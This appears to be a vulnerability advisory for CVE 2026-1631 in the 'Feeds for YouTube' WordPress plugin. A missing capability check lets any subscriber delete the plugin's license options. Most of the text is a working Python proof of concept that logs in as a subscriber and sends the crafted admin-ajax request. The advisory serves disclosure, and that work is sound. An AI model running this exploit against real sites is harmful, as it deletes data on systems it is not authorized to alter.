Feeds for YouTube < 2.6.4 – Subscriber+ License Data Deletion | CVE 2026-1631

Description

The plugin is vulnerable to unauthorized modification of the plugin's license key due to a missing capability check on the 'actions' function. This makes it possible for subscribers and above delete the license key.

Proof of Concept

Run a PHP snippet on the site to add sample license info for testing purposes:

```
update_option('sby_islicence_upgraded', '1');
update_option('sby_upgraded_info', 'test_license_data');
```

Run this Python script:

```
import requests

print("[!] Before running POC, verify the site contains data in options 'sby_islicence_upgraded' & 'sby_upgraded_info' ")
WORDPRESS_URL = input("Enter WordPress site URL: ").strip().rstrip('/')
SUBSCRIBER_USER = input("Enter subscriber username: ").strip()
SUBSCRIBER_PASS = input("Enter subscriber password: ").strip()

def login_subscriber(wp_url, username, password):
    session = requests.Session()
    login_url = f"{wp_url}/wp-login.php"
    session.get(login_url)
    payload = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': f"{wp_url}/wp-admin/",
        'testcookie': '1'
    }
    
    response = session.post(login_url, data=payload, allow_redirects=True)
    if any("wordpress_logged_in" in cookie.name for cookie in session.cookies):
        print(f"[+] Login successful as subscriber: {username}")
        return session
    else:
        print("[-] Login failed!")
        return None

def exploit_missing_auth(session, wp_url):
    ajax_url = f"{wp_url}/wp-admin/admin-ajax.php"
    payload = {
        'action': 'sby_recheck_connection',
        'license_key': 'any-license-key-123'  # Any value works
    }
    
    print(f"\n[+] Sending POST request to: {ajax_url}")
    print(f"[+] Action: {payload['action']}")
    print(f"[+] License key: {payload['license_key']}")
    
    try:
        response = session.post(ajax_url, data=payload)
        print("[+] Exploit to delete critical license information have been sent!")
        print(" Server response and status code doesn't matter...")
        print("\n Need to verify manually as admin that below options got deleted or wiped")
        print(" select * from wp_options where option_name in ('sby_islicence_upgraded','sby_upgraded_info'); ")
            
    except Exception as e:
        print(f"[-] Error: {e}")

def main():
    session = login_subscriber(WORDPRESS_URL, SUBSCRIBER_USER, SUBSCRIBER_PASS)
    if session:
        exploit_missing_auth(session, WORDPRESS_URL)
    else:
        print("[-] Cannot proceed without successful login")

if __name__ == "__main__":
    main()
```

Check the database and see that license info has been deleted.